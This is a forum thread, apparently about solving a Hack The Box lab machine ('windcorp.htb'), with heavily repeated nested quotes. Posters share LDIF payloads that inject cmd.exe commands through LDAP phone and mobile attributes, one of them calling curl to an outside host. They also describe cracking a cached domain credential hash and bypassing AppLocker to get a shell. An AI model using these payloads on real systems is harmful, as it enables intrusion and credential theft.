Posts: 57 Threads: 0 Joined: N/A September 19, 2022 at 8:20 AM Trying the following command to replace phone number with command injection: ldiff file
dn: CN=scriptrunner,CN=Users,DC=windcorp,DC=htb
changetype: modify
replace: telephonenumber
telephonenumber:" ; cmd.exe /c curl http://10.10.14.20:1234/ > \wc-share\segundo.txt "
command:
ldapmodify -h hope.windcorp.htb -D "CN=scriptrunner,CN=Users,DC=windcorp,DC=htb" -w "PASSWORD" -f test.ldiff
I get an error
ldap_bind: Invalid credentials (49)
additional info: 80090308: LdapErr: DSID-0C090436, comment: AcceptSecurityContext error, data 52e, v4f7c
Posts: 213 Threads: 0 Joined: N/A September 19, 2022 at 8:41 AM (September 19, 2022, 08:20 AM)samhub123 Wrote: Trying the following command to replace phone number with command injection:
ldiff file
dn: CN=scriptrunner,CN=Users,DC=windcorp,DC=htb
changetype: modify
replace: telephonenumber
telephonenumber:" ; cmd.exe /c curl http://10.10.14.20:1234/ > \wc-share\segundo.txt "
command:
ldapmodify -h hope.windcorp.htb -D "CN=scriptrunner,CN=Users,DC=windcorp,DC=htb" -w "PASSWORD" -f test.ldiff
I get an error
ldap_bind: Invalid credentials (49)
additional info: 80090308: LdapErr: DSID-0C090436, comment: AcceptSecurityContext error, data 52e, v4f7c
echo "dn: CN=Ray Duncan,OU=Development,DC=windcorp,DC=htb" > /root/mod.txt
echo "changetype: modify" >> /root/mod.txt
echo "replace: mobile" >> /root/mod.txt
echo "mobile: 1; cmd.exe /c whoami > \wc-share\test.txt" >> /root/mod.txt
ldapmodify -f /root/mod.txt -h hope.windcorp.htb
Posts: 57 Threads: 0 Joined: N/A September 19, 2022 at 8:48 AM (September 19, 2022, 08:41 AM)Exa Wrote: (September 19, 2022, 08:20 AM)samhub123 Wrote: Trying the following command to replace phone number with command injection:
ldiff file
dn: CN=scriptrunner,CN=Users,DC=windcorp,DC=htb
changetype: modify
replace: telephonenumber
telephonenumber:" ; cmd.exe /c curl http://10.10.14.20:1234/ > \wc-share\segundo.txt "
command:
ldapmodify -h hope.windcorp.htb -D "CN=scriptrunner,CN=Users,DC=windcorp,DC=htb" -w "PASSWORD" -f test.ldiff
I get an error
ldap_bind: Invalid credentials (49)
additional info: 80090308: LdapErr: DSID-0C090436, comment: AcceptSecurityContext error, data 52e, v4f7c
echo "dn: CN=Ray Duncan,OU=Development,DC=windcorp,DC=htb" > /root/mod.txt
echo "changetype: modify" >> /root/mod.txt
echo "replace: mobile" >> /root/mod.txt
echo "mobile: 1; cmd.exe /c whoami > \wc-share\test.txt" >> /root/mod.txt
ldapmodify -f /root/mod.txt -h hope.windcorp.htb
ahh, interesting, thanks Posts: 57 Threads: 0 Joined: N/A September 20, 2022 at 12:15 AM The following command works
mobile: 2;cmd.exe /c powershell -h > \wc-share\foo.txt
but any other powershell I cannot seem to get it running Posts: 78 Threads: 0 Joined: N/A September 20, 2022 at 12:53 AM (September 15, 2022, 07:33 PM)Hacker2222 Wrote: (September 15, 2022, 05:39 AM)meowmeowattack Wrote: not sure what to proceed next
after inspecting the ldb file, where you can find the domain sid, a domain user and the credential hash
var/lib/sss/db/cache_windcorp.htb.ldb
the credential hash can be john'd to reveal the password of the domain user
from there, can also do impersonation to get a Administrator.ccache
but the thing is, from the dns zone transfer and other info found, there are only two hosts found in the domain, webserver and hope. and none of them has any of the smb, ldap ports open. i start to wonder where to proceed next.
it is curious though, which host is serving the ssh port, it's nowhere to be found yet.
Edit: found new hosts by cracking the known_hosts file.
i think u can use password of ray.duncan to lgoin with ssh ? container has kinit &u can login using kinit ray.duncan then ssh -k to login ? ssh login as ray.duncan does not work tho ....... (September 19, 2022, 02:58 PM)Hacker2222 Wrote: (September 19, 2022, 08:12 AM)meowmeowattack Wrote: (September 15, 2022, 07:33 PM)Hacker2222 Wrote: (September 15, 2022, 05:39 AM)meowmeowattack Wrote: not sure what to proceed next
after inspecting the ldb file, where you can find the domain sid, a domain user and the credential hash
var/lib/sss/db/cache_windcorp.htb.ldb
the credential hash can be john'd to reveal the password of the domain user
from there, can also do impersonation to get a Administrator.ccache
but the thing is, from the dns zone transfer and other info found, there are only two hosts found in the domain, webserver and hope. and none of them has any of the smb, ldap ports open. i start to wonder where to proceed next.
it is curious though, which host is serving the ssh port, it's nowhere to be found yet.
Edit: found new hosts by cracking the known_hosts file.
i think u can use password of ray.duncan to lgoin with ssh ? container has kinit &u can login using kinit ray.duncan then ssh -k to login ? ssh login as ray.duncan does not work tho ....... (September 19, 2022, 01:12 AM)Hacker2222 Wrote: (September 19, 2022, 01:09 AM)meowmeowattack Wrote: (September 15, 2022, 07:33 PM)Hacker2222 Wrote: i think u can use password of ray.duncan to lgoin with ssh ? container has kinit &u can login using kinit ray.duncan then ssh -k to login ? ssh login as ray.duncan does not work tho ....... (September 19, 2022, 12:46 AM)Hacker2222 Wrote: box creator has bypass on github LOL https://github.com/4ndr34z/CLMBypassBlogpost just build c# put exe in applocker exeption dir . have not tried . maybe tomorrow
lol, of course... this is a very customised box. no wonder this didn't pop up i the search result
repo is a fork ...... think the original is better with char limit.
(September 19, 2022, 01:09 AM)meowmeowattack Wrote: (September 15, 2022, 07:33 PM)Hacker2222 Wrote: i think u can use password of ray.duncan to lgoin with ssh ? container has kinit &u can login using kinit ray.duncan then ssh -k to login ? ssh login as ray.duncan does not work tho ....... (September 19, 2022, 12:46 AM)Hacker2222 Wrote: box creator has bypass on github LOL https://github.com/4ndr34z/CLMBypassBlogpost just build c# put exe in applocker exeption dir . have not tried . maybe tomorrow
lol, of course... this is a very customised box. no wonder this didn't pop up i the search result
pls say if the code works so i dont have to try tomorrow ajjaja
haven't succeeded yet, so far i've tried: the link you found, mshta, alternative data stream, powershell downgrade (not enabled) and things listed here: https://github.com/api0cradle/UltimateAppLockerByPassList
u can get shell with https://github.com/4ndr34z/CLMBypassBlogpost jsut compile bypass c# and then put in applocker exeption dir . u can get applocker exeption with Get-AppLockerPolicy -Effective -Xml > /wc-share/derivacion .... then execute and shell
(September 19, 2022, 02:58 PM)Hacker2222 Wrote: (September 19, 2022, 08:12 AM)meowmeowattack Wrote: (September 15, 2022, 07:33 PM)Hacker2222 Wrote: (September 15, 2022, 05:39 AM)meowmeowattack Wrote: not sure what to proceed next
after inspecting the ldb file, where you can find the domain sid, a domain user and the credential hash
var/lib/sss/db/cache_windcorp.htb.ldb
the credential hash can be john'd to reveal the password of the domain user
from there, can also do impersonation to get a Administrator.ccache
but the thing is, from the dns zone transfer and other info found, there are only two hosts found in the domain, webserver and hope. and none of them has any of the smb, ldap ports open. i start to wonder where to proceed next.
it is curious though, which host is serving the ssh port, it's nowhere to be found yet.
Edit: found new hosts by cracking the known_hosts file.
i think u can use password of ray.duncan to lgoin with ssh ? container has kinit &u can login using kinit ray.duncan then ssh -k to login ? ssh login as ray.duncan does not work tho ....... (September 19, 2022, 01:12 AM)Hacker2222 Wrote: (September 19, 2022, 01:09 AM)meowmeowattack Wrote: lol, of course... this is a very customised box. no wonder this didn't pop up i the search result
repo is a fork ...... think the original is better with char limit.
(September 19, 2022, 01:09 AM)meowmeowattack Wrote: lol, of course... this is a very customised box. no wonder this didn't pop up i the search result
pls say if the code works so i dont have to try tomorrow ajjaja
haven't succeeded yet, so far i've tried: the link you found, mshta, alternative data stream, powershell downgrade (not enabled) and things listed here: https://github.com/api0cradle/UltimateAppLockerByPassList
u can get shell with https://github.com/4ndr34z/CLMBypassBlogpost jsut compile bypass c# and then put in applocker exeption dir . u can get applocker exeption with Get-AppLockerPolicy -Effective -Xml > /wc-share/derivacion .... then execute and shell
dont know next step tho the compiled binary doesn't seem to run even in an applocker exception folder that's globally writable to everyone. not sure what i'm missing * change the bypass code to point to my server * compiled the bypass on windows. tested * sent it to the target under an exception folder using wget * run it by calling the full path to the binary Posts: 78 Threads: 0 Joined: N/A September 20, 2022 at 1:11 AM (September 15, 2022, 07:33 PM)Hacker2222 Wrote: (September 15, 2022, 05:39 AM)meowmeowattack Wrote: not sure what to proceed next
after inspecting the ldb file, where you can find the domain sid, a domain user and the credential hash
var/lib/sss/db/cache_windcorp.htb.ldb
the credential hash can be john'd to reveal the password of the domain user
from there, can also do impersonation to get a Administrator.ccache
but the thing is, from the dns zone transfer and other info found, there are only two hosts found in the domain, webserver and hope. and none of them has any of the smb, ldap ports open. i start to wonder where to proceed next.
it is curious though, which host is serving the ssh port, it's nowhere to be found yet.
Edit: found new hosts by cracking the known_hosts file.
i think u can use password of ray.duncan to lgoin with ssh ? container has kinit &u can login using kinit ray.duncan then ssh -k to login ? ssh login as ray.duncan does not work tho ....... (September 20, 2022, 12:56 AM)Hacker2222 Wrote: (September 20, 2022, 12:53 AM)meowmeowattack Wrote: (September 15, 2022, 07:33 PM)Hacker2222 Wrote: (September 15, 2022, 05:39 AM)meowmeowattack Wrote: not sure what to proceed next
after inspecting the ldb file, where you can find the domain sid, a domain user and the credential hash
var/lib/sss/db/cache_windcorp.htb.ldb
the credential hash can be john'd to reveal the password of the domain user
from there, can also do impersonation to get a Administrator.ccache
but the thing is, from the dns zone transfer and other info found, there are only two hosts found in the domain, webserver and hope. and none of them has any of the smb, ldap ports open. i start to wonder where to proceed next.
it is curious though, which host is serving the ssh port, it's nowhere to be found yet.
Edit: found new hosts by cracking the known_hosts file.
i think u can use password of ray.duncan to lgoin with ssh ? container has kinit &u can login using kinit ray.duncan then ssh -k to login ? ssh login as ray.duncan does not work tho ....... (September 19, 2022, 02:58 PM)Hacker2222 Wrote: (September 19, 2022, 08:12 AM)meowmeowattack Wrote: (September 15, 2022, 07:33 PM)Hacker2222 Wrote: i think u can use password of ray.duncan to lgoin with ssh ? container has kinit &u can login using kinit ray.duncan then ssh -k to login ? ssh login as ray.duncan does not work tho ....... (September 19, 2022, 01:12 AM)Hacker2222 Wrote: repo is a fork ...... think the original is better with char limit.
pls say if the code works so i dont have to try tomorrow ajjaja
haven't succeeded yet, so far i've tried: the link you found, mshta, alternative data stream, powershell downgrade (not enabled) and things listed here: https://github.com/api0cradle/UltimateAppLockerByPassList
u can get shell with https://github.com/4ndr34z/CLMBypassBlogpost jsut compile bypass c# and then put in applocker exeption dir . u can get applocker exeption with Get-AppLockerPolicy -Effective -Xml > /wc-share/derivacion .... then execute and shell
(September 19, 2022, 02:58 PM)Hacker2222 Wrote: (September 19, 2022, 08:12 AM)meowmeowattack Wrote: haven't succeeded yet, so far i've tried: the link you found, mshta, alternative data stream, powershell downgrade (not enabled) and things listed here: https://github.com/api0cradle/UltimateAppLockerByPassList
u can get shell with https://github.com/4ndr34z/CLMBypassBlogpost jsut compile bypass c# and then put in applocker exeption dir . u can get applocker exeption with Get-AppLockerPolicy -Effective -Xml > /wc-share/derivacion .... then execute and shell
dont know next step tho
the compiled binary doesn't seem to run even in an applocker exception folder that's globally writable to everyone. not sure what i'm missing
* change the bypass code to point to my server
* compiled the bypass on windows. tested
* sent it to the target under an exception folder using wget
* run it by calling the full path to the binary
what dir u used?
(September 20, 2022, 12:53 AM)meowmeowattack Wrote: (September 15, 2022, 07:33 PM)Hacker2222 Wrote: (September 15, 2022, 05:39 AM)meowmeowattack Wrote: not sure what to proceed next
after inspecting the ldb file, where you can find the domain sid, a domain user and the credential hash
var/lib/sss/db/cache_windcorp.htb.ldb
the credential hash can be john'd to reveal the password of the domain user
from there, can also do impersonation to get a Administrator.ccache
but the thing is, from the dns zone transfer and other info found, there are only two hosts found in the domain, webserver and hope. and none of them has any of the smb, ldap ports open. i start to wonder where to proceed next.
it is curious though, which host is serving the ssh port, it's nowhere to be found yet.
Edit: found new hosts by cracking the known_hosts file.
i think u can use password of ray.duncan to lgoin with ssh ? container has kinit &u can login using kinit ray.duncan then ssh -k to login ? ssh login as ray.duncan does not work tho ....... (September 19, 2022, 02:58 PM)Hacker2222 Wrote: (September 19, 2022, 08:12 AM)meowmeowattack Wrote: (September 15, 2022, 07:33 PM)Hacker2222 Wrote: i think u can use password of ray.duncan to lgoin with ssh ? container has kinit &u can login using kinit ray.duncan then ssh -k to login ? ssh login as ray.duncan does not work tho ....... (September 19, 2022, 01:12 AM)Hacker2222 Wrote: repo is a fork ...... think the original is better with char limit.
pls say if the code works so i dont have to try tomorrow ajjaja
haven't succeeded yet, so far i've tried: the link you found, mshta, alternative data stream, powershell downgrade (not enabled) and things listed here: https://github.com/api0cradle/UltimateAppLockerByPassList
u can get shell with https://github.com/4ndr34z/CLMBypassBlogpost jsut compile bypass c# and then put in applocker exeption dir . u can get applocker exeption with Get-AppLockerPolicy -Effective -Xml > /wc-share/derivacion .... then execute and shell
(September 19, 2022, 02:58 PM)Hacker2222 Wrote: (September 19, 2022, 08:12 AM)meowmeowattack Wrote: haven't succeeded yet, so far i've tried: the link you found, mshta, alternative data stream, powershell downgrade (not enabled) and things listed here: https://github.com/api0cradle/UltimateAppLockerByPassList
u can get shell with https://github.com/4ndr34z/CLMBypassBlogpost jsut compile bypass c# and then put in applocker exeption dir . u can get applocker exeption with Get-AppLockerPolicy -Effective -Xml > /wc-share/derivacion .... then execute and shell
dont know next step tho
the compiled binary doesn't seem to run even in an applocker exception folder that's globally writable to everyone. not sure what i'm missing
* change the bypass code to point to my server
* compiled the bypass on windows. tested
* sent it to the target under an exception folder using wget
* run it by calling the full path to the binary
read applocker exeptions correctly .... exeptions are confusing ye, i was worried that i could interpret the terms exeption incorrectly, therefore i tried two folders: c:\windows\temp and c:\windows\debug Posts: 57 Threads: 0 Joined: N/A September 20, 2022 at 1:12 AM I have also tried C:\ProgramData and C:\ProgramFiles Posts: 57 Threads: 0 Joined: N/A September 20, 2022 at 1:48 AM [quote="Hacker2222" pid="476288" dateline="1663637274"][quote="samhub123" pid="476209" dateline="1663636378"]I have also tried C:\ProgramData and C:\ProgramFiles [/quote]try writeable dirs in %WINDIR% not in exeption list[/quote]I did a icacls on C:\windows\* and also checked whoami /groups but i dont see anything that has modify permissions. Posts: 78 Threads: 0 Joined: N/A September 20, 2022 at 3:49 AM [quote="Hacker2222" pid="437180" dateline="1663270415"][quote="meowmeowattack" pid="429373" dateline="1663220359"]not sure what to proceed nextafter inspecting the ldb file, where you can find the domain sid, a domain user and the credential hash[code]var/lib/sss/db/cache_windcorp.htb.ldb[/code]the credential hash can be john'd to reveal the password of the domain userfrom there, can also do impersonation to get a Administrator.ccachebut the thing is, from the dns zone transfer and other info found, there are only two hosts found in the domain, webserver and hope. and none of them has any of the smb, ldap ports open. i start to wonder where to proceed next.it is curious though, which host is serving the ssh port, it's nowhere to be found yet.Edit: found new hosts by cracking the known_hosts file.[/quote]i think u can use password of ray.duncan to lgoin with ssh ? container has kinit &u can login using kinit ray.duncan then ssh -k to login ? ssh login as ray.duncan does not work tho .......[/quote][quote="Hacker2222" pid="476859" dateline="1663641675"][quote="samhub123" pid="476436" dateline="1663638521"][quote="Hacker2222" pid="476288" dateline="1663637274"][quote="samhub123" pid="476209" dateline="1663636378"]I have also tried C:\ProgramData and C:\ProgramFiles [/quote]try writeable dirs in %WINDIR% not in exeption list[/quote]I did a icacls on C:\windows\* and also checked whoami /groups but i dont see anything that has modify permissions.[/quote]just google writeable dirs on %WINDIR% and look at exeptions . u can have write on dirs within dirs.....[/quote]i think i stepped on my own feet while trying to keep the commands as short as possible. it turns out for start-process to run an exe, the file extension actually matters.... Posts: 57 Threads: 0 Joined: N/A September 20, 2022 at 4:20 AM [quote="meowmeowattack" pid="477385" dateline="1663645767"][quote="Hacker2222" pid="437180" dateline="1663270415"][quote="meowmeowattack" pid="429373" dateline="1663220359"]not sure what to proceed nextafter inspecting the ldb file, where you can find the domain sid, a domain user and the credential hash[code]var/lib/sss/db/cache_windcorp.htb.ldb[/code]the credential hash can be john'd to reveal the password of the domain userfrom there, can also do impersonation to get a Administrator.ccachebut the thing is, from the dns zone transfer and other info found, there are only two hosts found in the domain, webserver and hope. and none of them has any of the smb, ldap ports open. i start to wonder where to proceed next.it is curious though, which host is serving the ssh port, it's nowhere to be found yet.Edit: found new hosts by cracking the known_hosts file.[/quote]i think u can use password of ray.duncan to lgoin with ssh ? container has kinit &u can login using kinit ray.duncan then ssh -k to login ? ssh login as ray.duncan does not work tho .......[/quote][quote="Hacker2222" pid="476859" dateline="1663641675"][quote="samhub123" pid="476436" dateline="1663638521"][quote="Hacker2222" pid="476288" dateline="1663637274"][quote="samhub123" pid="476209" dateline="1663636378"]I have also tried C:\ProgramData and C:\ProgramFiles [/quote]try writeable dirs in %WINDIR% not in exeption list[/quote]I did a icacls on C:\windows\* and also checked whoami /groups but i dont see anything that has modify permissions.[/quote]just google writeable dirs on %WINDIR% and look at exeptions . u can have write on dirs within dirs.....[/quote]i think i stepped on my own feet while trying to keep the commands as short as possible. it turns out for start-process to run an exe, the file extension actually matters....[/quote]what payload are you compiling into the bypass? |
